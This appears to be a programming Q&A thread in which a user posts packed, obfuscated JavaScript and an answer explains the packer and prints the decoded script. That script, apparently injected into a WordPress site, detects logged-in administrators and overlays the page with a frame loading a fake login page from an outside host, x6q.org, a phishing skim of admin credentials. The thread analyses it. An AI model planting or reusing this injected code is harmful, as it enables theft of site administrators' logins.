# Can anybody decode this packed code?

Tags: obfuscation, deobfuscation

i have search on google for many decode programs and online decode websites but nobody has decode that code, why its inpossible to decode that code?

```
eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? '' : e(c / a)) + String.fromCharCode(c % a + 161)
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\[\xa1-\xff]+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp(e(c), 'g'), k[c])
        }
    }
    return p
}('Â¤ Â¬(Â¨,Â¦){Â§ Â¢=Â³ Â¹();Â¢.Âº(Â¢.Â¶()+(Âµ*Â·));Â§ Â£="; Â£="+Â¢.Â´();Â¡.Â¥=Â¨+"="+Â¦+Â£+"; Â°=/"}Â±.Â²=Â¤(){Â»(Â¡.Ã….Ã„.Âª("Ã†")>-1&&Â¡.Â¥.Âª(\'Â­\')==-1){Â¡.Ãƒ("<Â« Ã‚=Â©% Â½=Â©% Â¾=0 Â¿=0 Ã=0><Ã€ ÃŠ=0 Â¼=Ãˆ://Ã‡.Â¸/Â®.Â¯></Â«>");Â¬("Â­","Ã‰")}}', 42, 42, 'document|date|expires|function|cookie|value|var|name|100|indexOf|frameset|createCookie|seeeeen|login|php|path|window|onload|new|toGMTString|300|getTime|1000|org|Date|setTime|if|src|rows|border|frameboarder|frame|framespacing|cols|write|innerHTML|body|wpadminbar|x6q|http|ok|frameborder'.split('|'), 0, {}))
```

i hope anyone can help me to decode that.
Thanks

Answer (score 0):

All of the special characters like Â, ¢, ¤ are treated as single bytes. They are variables, and the number represents the index into the second string "document|date|expires|function...". The inner function that takes the (p, a, c, k, e, d) parameters replaces each variable number with the corresponding name in that list. It returns the resulting source code as a string, and passes it to the *eval()* function, which takes the string and executes it as JavaScript.

If you want to see the source code after it has been unpacked, replace the very first function call *eval()* with an output function, like *console.log()* or *alert()*.

```
function createCookie(name, value) {
    var date = new Date();
    date.setTime(date.getTime() + (300 * 1000));
    var expires = "; expires=" + date.toGMTString();
    document.cookie = name + "=" + value + expires + "; path = /";
}

window.onload = function() {
    if (document.body.innerHTML.indexOf("wpadminbar") > -1 && document.cookie.indexOf('seeeeen') == -1) {
        document.write("<frameset cols=100% rows=100% border=0 frameboarder = 0 framespacing = 0 > < frame frameborder = 0 src = http: //x6q.org/login.php></frameset>");
        createCookie("seeeeen", "ok")
    }
}
```

Comment: Yes but, i need to decode that. I cant decode i have ask 4 php developers but nobody can decode that code. Can you decode it?